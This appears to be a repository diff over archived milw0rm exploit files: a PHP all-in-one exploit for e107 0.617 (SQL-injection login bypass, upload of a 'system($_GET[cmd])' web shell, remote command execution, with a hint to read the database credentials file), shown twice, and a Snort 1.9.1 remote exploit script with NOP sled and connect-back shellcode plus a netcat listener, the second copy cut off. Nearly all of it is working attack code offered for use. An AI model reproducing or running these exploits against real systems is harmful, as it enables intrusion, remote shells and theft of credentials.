i=i+optlen;
} else {
/* We could not read this portion because of some error, skip it */
i=i+4;
}
}
return 0;
}
// milw0rm.com [2007-07-10]

View file

@ -1,261 +1,261 @@
<?php
# 0.27 18/10/2005 #
# #
# ---e017_xpl.php #
# #
# e107 0.617 resetcore.php SQL Injection & remote code execution all-in-one #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: customize for your own pleasure, launch this script from Apache, #
# fill requested fields, then go! #
# #
# Sun-Tzu: "There is a proper season for making attacks with fire, and #
# special days for starting a conflagration. The proper season is when #
# the weather is very dry; the special days are those when the moon is #
# in the constellations of the Sieve, the Wall, the Wing or the Cross-bar; #
# for these four are all days of rising wind." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title>e107 0.617 remote commands execution </title><meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBc81; } a:hover{text-decoration: underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
e107 0.617 resetcore.php SQL injection & remote commands execution </p> <p>
<class="Stile6"> a script byrgod at <a href="http://rgod.altervista.org"
target="_blank">http://rgod.altervista.org</a></p> <table width="84%"><tr> <td
width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'
?path=value&host=value&port=value&command=value&proxy=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname (ex: www.sitename.com)
</span></p><p> <input type="text" name="path"><span class="Stile5">path (ex: /e1
07/ or just /)</span></p><p><input type="text" name="port"><span class="Stile5">
specify a port other than 80 (default value) </span> </p> <p><input type="text"
name="command"><span class="Stile5">a shell command, cat ./../../e107_config.
php to see database username/password </span> </p> <p> <input type="text"
name="proxy"><span class="Stile5">send exploit through an HTTP proxy (ip:port)
</span></p><p><input type="submit" name="Submit" value="go!"> </p></form></td>
</tr></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
function sendpacket($packet)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$proxy=trim($proxy);
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($path<>'') and ($host<>'') and ($command<>''))
{
$port=intval($port);
if (($port=='') or ($port<=0)) {$port=80;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port);
#STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings
$data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)."
&sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu
&siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a
&sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+
is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+%
3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E.
&newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1
&user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10&
smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S&
shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage=
English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1&
log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0&
forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie&
cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80&
im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php&
upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1&
displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1&
antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name=";
$data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e";
// ^ ^
// | |
// here we have login bypass ;) hash of [nothing]
//so, you see, we activate public uploads and .php extensions for attachments
$packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
if (eregi("Core settings successfully updated",$html)) {echo '<br>Ok... we reset core values...Continue...';}
else {echo '<br>Exploit failed...'; die;}
#STEP 2 -> Upload a shell...
$data='------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_name"
baby
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_version"
666
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php"
Content-Type: multipart/form-data
<?php error_reporting(0); ini_set("max_execution_time",0);
echo "Hi Master\r\n"; system($HTTP_GET_VARS[cmd]); ?>
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename=""
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_description"
mphhh....
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_website"
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_demo"
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="upload"
Submit and Upload
------------W1dUnnWzZExD8Rb1Pctwsq--';
$packet="POST ".$p."upload.php HTTP/1.1\r\n";
$packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$packet.="Accept-Language: it,en;q=0.9\r\n";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n";
$packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n";
$packet.="Cookie2: \$Version=1\r\n";
$packet.="Connection: Close, TE\r\n";
$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
#STEP 3 -> Launch commands...
$packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="User-Agent: Website eXtractor\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacket($packet);
if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';}
else {echo 'Exploit failed...';}
}
else
{echo 'Fill in requested fields, optionally specify a proxy...';}
?>
# milw0rm.com [2005-10-18]
<?php
# 0.27 18/10/2005 #
# #
# ---e017_xpl.php #
# #
# e107 0.617 resetcore.php SQL Injection & remote code execution all-in-one #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: customize for your own pleasure, launch this script from Apache, #
# fill requested fields, then go! #
# #
# Sun-Tzu: "There is a proper season for making attacks with fire, and #
# special days for starting a conflagration. The proper season is when #
# the weather is very dry; the special days are those when the moon is #
# in the constellations of the Sieve, the Wall, the Wing or the Cross-bar; #
# for these four are all days of rising wind." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title>e107 0.617 remote commands execution </title><meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBc81; } a:hover{text-decoration: underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
e107 0.617 resetcore.php SQL injection & remote commands execution </p> <p>
<class="Stile6"> a script byrgod at <a href="http://rgod.altervista.org"
target="_blank">http://rgod.altervista.org</a></p> <table width="84%"><tr> <td
width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'
?path=value&host=value&port=value&command=value&proxy=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname (ex: www.sitename.com)
</span></p><p> <input type="text" name="path"><span class="Stile5">path (ex: /e1
07/ or just /)</span></p><p><input type="text" name="port"><span class="Stile5">
specify a port other than 80 (default value) </span> </p> <p><input type="text"
name="command"><span class="Stile5">a shell command, cat ./../../e107_config.
php to see database username/password </span> </p> <p> <input type="text"
name="proxy"><span class="Stile5">send exploit through an HTTP proxy (ip:port)
</span></p><p><input type="submit" name="Submit" value="go!"> </p></form></td>
</tr></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
function sendpacket($packet)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$proxy=trim($proxy);
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($path<>'') and ($host<>'') and ($command<>''))
{
$port=intval($port);
if (($port=='') or ($port<=0)) {$port=80;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port);
#STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings
$data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)."
&sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu
&siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a
&sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+
is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+%
3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E.
&newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1
&user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10&
smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S&
shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage=
English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1&
log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0&
forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie&
cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80&
im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php&
upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1&
displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1&
antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name=";
$data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e";
// ^ ^
// | |
// here we have login bypass ;) hash of [nothing]
//so, you see, we activate public uploads and .php extensions for attachments
$packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
if (eregi("Core settings successfully updated",$html)) {echo '<br>Ok... we reset core values...Continue...';}
else {echo '<br>Exploit failed...'; die;}
#STEP 2 -> Upload a shell...
$data='------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_name"
baby
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_version"
666
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php"
Content-Type: multipart/form-data
<?php error_reporting(0); ini_set("max_execution_time",0);
echo "Hi Master\r\n"; system($HTTP_GET_VARS[cmd]); ?>
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename=""
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_description"
mphhh....
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_website"
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_demo"
------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="upload"
Submit and Upload
------------W1dUnnWzZExD8Rb1Pctwsq--';
$packet="POST ".$p."upload.php HTTP/1.1\r\n";
$packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$packet.="Accept-Language: it,en;q=0.9\r\n";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n";
$packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n";
$packet.="Cookie2: \$Version=1\r\n";
$packet.="Connection: Close, TE\r\n";
$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
#STEP 3 -> Launch commands...
$packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="User-Agent: Website eXtractor\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacket($packet);
if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';}
else {echo 'Exploit failed...';}
}
else
{echo 'Fill in requested fields, optionally specify a proxy...';}
?>
# milw0rm.com [2005-10-18]

View file

@ -556,6 +556,6 @@ int GetNextAddr(int Addr)
}
return(Addr);
}
// milw0rm.com [2003-12-27]
}
// milw0rm.com [2003-12-27]

View file

@ -1,143 +1,143 @@
#!/bin/sh
##########################################################
# p7snort191.sh by truff (truff@projet7.org) #
# Snort 1.9.1 and below remote exploit #
# #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources #
# #
# Usage: #
# 1/ Launch a listening netcat to listen for the shell #
# nc -p 45295 -l #
# #
# 2/ p7snort119.sh yourIP [Ret_Addr] #
# #
# Where yourIP is the IP where the netcat is listening #
# and Ret_Addr is the address (8 hexa digits) of the #
# shellcode (eg: 0819fec2) #
# #
# #
# This vulnerability was discovered by Bruce Leidl, #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil #
# from Core Security Technologies during Bugweek 2003. #
# #
# Greetz to #root people and projet7 members. #
# Special thx to mycroft for helping me with shell #
# scripting stuff. #
# #
# www.projet7.org - Security Researchs - #
##########################################################
# Put here the path to your hping2 binary
HPING2=/usr/sbin/hping2
# You should change these params to make the snort sensor
# capture the packets.
IPSRC=192.168.22.1
IPDST=192.168.22.2
PTSRC=3339
PTDST=111
echo "p7snort191.sh by truff (truff@projet7.org)"
case $# in
0)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
1)
RET=0819fec2
echo "Using default retaddr (Slackware 8.0)"
echo $RET
;;
2)
RET=$2
echo "Using custom retaddr"
echo $RET
;;
*)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
esac
# Nops
i=0
while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1)
echo -n -e "\x90" >> egg
done
# linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef)
echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
echo -n -e "\x68" >> egg
# IP here
echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
$(echo $1 | cut -d. -f2) \
$(echo $1 | cut -d. -f3) \
$(echo $1 | cut -d. -f4)) >> egg
echo -n -e "\x66\x68\xb0" >> egg
echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg
echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
echo -n -e "\x01\xcd\x80" >> egg
# 3 dummy bytes for alignment purposes
echo -n -e "\x41\x41\x41" >> egg
i=0
cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4)
var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2)
while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1)
echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
done
# hping ruleZ
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null
$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
-d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
1>/dev/null 2>/dev/null
rm egg
echo "Exploit Sended"
# milw0rm.com [2003-04-23]
#!/bin/sh
##########################################################
# p7snort191.sh by truff (truff@projet7.org) #
# Snort 1.9.1 and below remote exploit #
# #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources #
# #
# Usage: #
# 1/ Launch a listening netcat to listen for the shell #
# nc -p 45295 -l #
# #
# 2/ p7snort119.sh yourIP [Ret_Addr] #
# #
# Where yourIP is the IP where the netcat is listening #
# and Ret_Addr is the address (8 hexa digits) of the #
# shellcode (eg: 0819fec2) #
# #
# #
# This vulnerability was discovered by Bruce Leidl, #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil #
# from Core Security Technologies during Bugweek 2003. #
# #
# Greetz to #root people and projet7 members. #
# Special thx to mycroft for helping me with shell #
# scripting stuff. #
# #
# www.projet7.org - Security Researchs - #
##########################################################
# Put here the path to your hping2 binary
HPING2=/usr/sbin/hping2
# You should change these params to make the snort sensor
# capture the packets.
IPSRC=192.168.22.1
IPDST=192.168.22.2
PTSRC=3339
PTDST=111
echo "p7snort191.sh by truff (truff@projet7.org)"
case $# in
0)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
1)
RET=0819fec2
echo "Using default retaddr (Slackware 8.0)"
echo $RET
;;
2)
RET=$2
echo "Using custom retaddr"
echo $RET
;;
*)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
esac
# Nops
i=0
while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1)
echo -n -e "\x90" >> egg
done
# linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef)
echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
echo -n -e "\x68" >> egg
# IP here
echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
$(echo $1 | cut -d. -f2) \
$(echo $1 | cut -d. -f3) \
$(echo $1 | cut -d. -f4)) >> egg
echo -n -e "\x66\x68\xb0" >> egg
echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg
echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
echo -n -e "\x01\xcd\x80" >> egg
# 3 dummy bytes for alignment purposes
echo -n -e "\x41\x41\x41" >> egg
i=0
cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4)
var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2)
while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1)
echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
done
# hping ruleZ
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null
$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
